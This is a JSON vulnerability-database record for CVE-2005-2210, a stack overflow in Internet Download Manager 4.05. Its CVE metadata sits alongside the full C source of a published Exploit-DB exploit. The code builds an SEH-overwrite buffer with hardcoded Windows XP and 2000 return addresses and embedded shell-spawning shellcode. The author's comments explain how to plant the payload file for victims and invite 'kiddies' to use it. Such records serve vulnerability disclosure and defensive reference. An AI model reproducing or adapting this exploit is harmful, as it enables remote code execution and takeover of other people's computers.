{"cve": [{"lastseen": "2020-10-03T11:34:55", "description": "Stack-based buffer overflow in Internet Download Manager 4.05 allows remote attackers to execute arbitrary code via a long URL.", "edition": 3, "cvss3": {}, "published": "2005-07-11T04:00:00", "title": "CVE-2005-2210", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-2210"], "modified": "2008-09-05T20:51:00", "cpe": ["cpe:/a:tonec_inc.:internet_download_manager:4.05"], "id": "CVE-2005-2210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2210", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:tonec_inc.:internet_download_manager:4.05:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T13:31:58", "description": "Internet Download Manager <= 4.05 Input URL Stack Overflow Exploit. CVE-2005-2210. Local exploit for windows platform", "published": "2005-07-06T00:00:00", "type": "exploitdb", "title": "Internet Download Manager <= 4.0.5 - Input URL Stack Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2210"], "modified": "2005-07-06T00:00:00", "id": "EDB-ID:1091", "href": "https://www.exploit-db.com/exploits/1091/", "sourceData": "/*\r\n\r\n Title : Internet Download Manager =< 4.05 universal remote overflow Exploit\r\n bug analyse and exploit code by : c0d3r \"Kaveh Razavi\" c0d3r@ihsteam.com\r\n my advisory : http://www.ihsteam.com/advisory/download_manager_adv.txt\r\n \r\n ************************************************************************\r\n \r\n this bug is differnt from what was found in application called altnet\r\n download manager .\r\n if you read the code carefully you see that I left thingz for you .\r\n well if you want to creat an html file linked to evil download offer\r\n needed thingz are there , but in IE they are not usable cause exploit\r\n string is bigger that IE input buffer .\r\n I was analysing this bug and I was thinking about how to code an exploit\r\n for this issue , then new Mozilla exploit came up ! yea the idea of saving\r\n the exploit string into a file then copy/paste it to download manager \r\n inpute url . there are other ways for sure . kiddies still can have fun\r\n with this code just as I mentioned with a bit scripting in java or other \r\n shits you can link exploit string which will be created in file exploit.txt\r\n you can have a bad file , anyone using download manager can give a shell !\r\n hint! : any other folder is being counted , so my suggestion is linking to \r\n root webfolder .\r\n sample usage shown in a 1 minute movie which can be downloaded at :\r\n http://www.ihsteam.com/download/video/dlm.rar\r\n \r\n ************************************************************************\r\n\r\n Exploit method : Structured Exception Handling known as SEH .\r\n Targets : should work on all win2000 and win xp's even sp2 ,\r\n Tested : winxp sp 1 and win2000 server sp 4\r\n compile : ms visual c++ 6 : cl dlm.c\r\n \r\n ************************************************************************\r\n\r\n Greetingz :\r\n \r\n www.ihsteam.com LorD and NT , LorD always makes me happy with those\r\n www.ihssecurity.com Nasa , berkely , stanford ,... shells :>\r\n www.exploitdev.com yeah me and jamie are just started , u r0x jamie ,\r\n www.metasploit.com fewer words better ones , great !\r\n www.class101.org nice work is being done here ! class I used ur offsets :)\r\n www.c0d3r.org my home ,nth here right now but those nice Essence words.\r\n other Folks and friends not mentioned here .\r\n\r\n*/ \r\n\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <windows.h>\r\n#define exploit \"exploit.txt\"\r\n#define NOP 0x90\r\n#define size 2519\r\n \r\n int main(int argc,char **argv)\r\n{\r\n\r\n/*\r\nchar crap1[]= \r\n\"\\x3C\\x48\\x45\\x41\\x44\\x3E\"\r\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\r\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x43\\x6F\\x6E\\x74\\x65\\x6E\"\r\n\"\\x74\\x2D\\x54\\x79\\x70\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\"\r\n\"\\x65\\x6E\\x74\\x3D\\x22\\x74\\x65\\x78\\x74\\x2F\\x68\\x74\"\r\n\"\\x6D\\x6C\\x3B\\x20\\x63\\x68\\x61\\x72\\x73\\x65\\x74\\x3D\"\r\n\"\\x69\\x73\\x6F\\x2D\\x38\\x38\\x35\\x39\\x2D\\x31\\x22\\x3E\"\r\n\"\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\"\r\n\"\\x71\\x75\\x69\\x76\\x3D\\x22\\x72\\x65\\x66\\x72\\x65\\x73\"\r\n\"\\x68\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\"\r\n\"\\x33\\x3B\\x20\\x55\\x52\\x4C\\x3D\";\r\nchar crap2[]= \"\\x22\\x3E\";\r\nchar crap3[]=\r\n\"\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\"\r\n\"\\x3C\\x2F\\x42\\x4F\\x44\\x59\\x3E\"\r\n\"\\x3C\\x2F\\x48\\x54\\x4D\\x4C\\x3E\";\r\n*/\r\n char crap4[]= \"\\x31\\x31\\x2E\";\r\n\r\n\r\n// metasploit shellc0de wow!!! LPORT=4444 Size=399 \r\n unsigned char shellcode[] =\r\n\"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x4f\\x85\"\r\n\"\\x2f\\x98\\x83\\xeb\\xfc\\xe2\\xf4\\xb3\\x6d\\x79\\x98\\x4f\\x85\\x7c\\xcd\\x19\"\r\n\"\\xd2\\xa4\\xf4\\x6b\\x9d\\xa4\\xdd\\x73\\x0e\\x7b\\x9d\\x37\\x84\\xc5\\x13\\x05\"\r\n\"\\x9d\\xa4\\xc2\\x6f\\x84\\xc4\\x7b\\x7d\\xcc\\xa4\\xac\\xc4\\x84\\xc1\\xa9\\xb0\"\r\n\"\\x79\\x1e\\x58\\xe3\\xbd\\xcf\\xec\\x48\\x44\\xe0\\x95\\x4e\\x42\\xc4\\x6a\\x74\"\r\n\"\\xf9\\x0b\\x8c\\x3a\\x64\\xa4\\xc2\\x6b\\x84\\xc4\\xfe\\xc4\\x89\\x64\\x13\\x15\"\r\n\"\\x99\\x2e\\x73\\xc4\\x81\\xa4\\x99\\xa7\\x6e\\x2d\\xa9\\x8f\\xda\\x71\\xc5\\x14\"\r\n\"\\x47\\x27\\x98\\x11\\xef\\x1f\\xc1\\x2b\\x0e\\x36\\x13\\x14\\x89\\xa4\\xc3\\x53\"\r\n\"\\x0e\\x34\\x13\\x14\\x8d\\x7c\\xf0\\xc1\\xcb\\x21\\x74\\xb0\\x53\\xa6\\x5f\\xce\"\r\n\"\\x69\\x2f\\x99\\x4f\\x85\\x78\\xce\\x1c\\x0c\\xca\\x70\\x68\\x85\\x2f\\x98\\xdf\"\r\n\"\\x84\\x2f\\x98\\xf9\\x9c\\x37\\x7f\\xeb\\x9c\\x5f\\x71\\xaa\\xcc\\xa9\\xd1\\xeb\"\r\n\"\\x9f\\x5f\\x5f\\xeb\\x28\\x01\\x71\\x96\\x8c\\xda\\x35\\x84\\x68\\xd3\\xa3\\x18\"\r\n\"\\xd6\\x1d\\xc7\\x7c\\xb7\\x2f\\xc3\\xc2\\xce\\x0f\\xc9\\xb0\\x52\\xa6\\x47\\xc6\"\r\n\"\\x46\\xa2\\xed\\x5b\\xef\\x28\\xc1\\x1e\\xd6\\xd0\\xac\\xc0\\x7a\\x7a\\x9c\\x16\"\r\n\"\\x0c\\x2b\\x16\\xad\\x77\\x04\\xbf\\x1b\\x7a\\x18\\x67\\x1a\\xb5\\x1e\\x58\\x1f\"\r\n\"\\xd5\\x7f\\xc8\\x0f\\xd5\\x6f\\xc8\\xb0\\xd0\\x03\\x11\\x88\\xb4\\xf4\\xcb\\x1c\"\r\n\"\\xed\\x2d\\x98\\x5e\\xd9\\xa6\\x78\\x25\\x95\\x7f\\xcf\\xb0\\xd0\\x0b\\xcb\\x18\"\r\n\"\\x7a\\x7a\\xb0\\x1c\\xd1\\x78\\x67\\x1a\\xa5\\xa6\\x5f\\x27\\xc6\\x62\\xdc\\x4f\"\r\n\"\\x0c\\xcc\\x1f\\xb5\\xb4\\xef\\x15\\x33\\xa1\\x83\\xf2\\x5a\\xdc\\xdc\\x33\\xc8\"\r\n\"\\x7f\\xac\\x74\\x1b\\x43\\x6b\\xbc\\x5f\\xc1\\x49\\x5f\\x0b\\xa1\\x13\\x99\\x4e\"\r\n\"\\x0c\\x53\\xbc\\x07\\x0c\\x53\\xbc\\x03\\x0c\\x53\\xbc\\x1f\\x08\\x6b\\xbc\\x5f\"\r\n\"\\xd1\\x7f\\xc9\\x1e\\xd4\\x6e\\xc9\\x06\\xd4\\x7e\\xcb\\x1e\\x7a\\x5a\\x98\\x27\"\r\n\"\\xf7\\xd1\\x2b\\x59\\x7a\\x7a\\x9c\\xb0\\x55\\xa6\\x7e\\xb0\\xf0\\x2f\\xf0\\xe2\"\r\n\"\\x5c\\x2a\\x56\\xb0\\xd0\\x2b\\x11\\x8c\\xef\\xd0\\x67\\x79\\x7a\\xfc\\x67\\x3a\"\r\n\"\\x85\\x47\\x68\\xc5\\x81\\x70\\x67\\x1a\\x81\\x1e\\x43\\x1c\\x7a\\xff\\x98\";\r\n FILE *fp; \r\n char buffer[size];\r\n unsigned int os;\r\n char ppr[5];\r\n char jmp[] = \"\\xEB\\x0C\\x90\\x90\";\r\n char winxp[] = \"\\xB1\\x2C\\xC2\\x77\"; \r\n char win2000[] =\"\\x08\\xB0\\x01\\x78\";\r\n if(argc < 2) {\r\n printf(\"\\n-------- Download Manager remote exploit\\n\");\r\n printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\r\n printf(\"-------- usage : dlm.exe target\\n\");\r\n printf(\"-------- target 1 : windows xp all service packs all languages : 0\\n\");\r\n printf(\"-------- target 2 : windows 2000 all service packs all languages : 1\\n\");\r\n printf(\"-------- eg : dlm.exe 0\\n\");\t\r\n printf(\"-------- out file will be exploit.txt for windows xp\\n\\n\");\r\n exit(-1) ;\r\n } \r\n os = (unsigned short)atoi(argv[1]); \t \r\n switch(os)\r\n {\r\n case 0:\r\n strcat(ppr,winxp);\r\n break;\r\n case 1:\r\n strcat(ppr,win2000); \r\n break;\r\n default:\r\n printf(\"\\n[-] this target doesnt exist in the list\\n\\n\");\r\n \r\n exit(-1);\r\n }\r\n printf(\"\\n-------- Download Manager remote exploit\\n\");\r\n printf(\"-------- copyrighted by c0d3r of IHS 2005\\n\");\r\n \r\n // heart of exploit\r\n \r\n printf(\"-------- building overflow string\\n\");\r\n memset(buffer,NOP,size);\r\n memcpy(buffer,crap4,sizeof(crap4)-1);\r\n\tmemcpy(buffer+3+2077,jmp,4);\r\n\tmemcpy(buffer+3+2077+4,ppr,4);\r\n\tmemcpy(buffer+3+2077+4+40,shellcode,sizeof(shellcode)-1);\r\n\tbuffer[size] = 0;\r\n \r\n\t/*\r\n memcpy(buffer,crap1,sizeof(crap1)-1);\r\n\tmemcpy(buffer+122,crap4,sizeof(crap4)-1);\r\n memcpy(buffer+2192,jmp,4);\r\n memcpy(buffer+2196,ppr,4);\r\n memcpy(buffer+2200,shellcode,sizeof(shellcode)-1);\r\n memcpy(buffer+2599,crap2,sizeof(crap2)-1);\r\n memcpy(buffer+2601,crap3,sizeof(crap3)-1);\r\n buffer[size] = 0;\r\n */\r\n\t\r\n // EO heart of exploit \r\n \r\n\tprintf(\"-------- Done !\\n\");\r\n printf(\"-------- Creating the exploit.txt file\\n\");\r\n fp = fopen(exploit, \"w+\");\r\n fwrite(buffer, sizeof ( unsigned char ), sizeof(buffer), fp);\r\n fclose(fp);\r\n printf(\"-------- Done ! enjoy it !\\n\");\r\n return 0;\r\n\r\n}\n\n// milw0rm.com [2005-07-06]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1091/"}]}
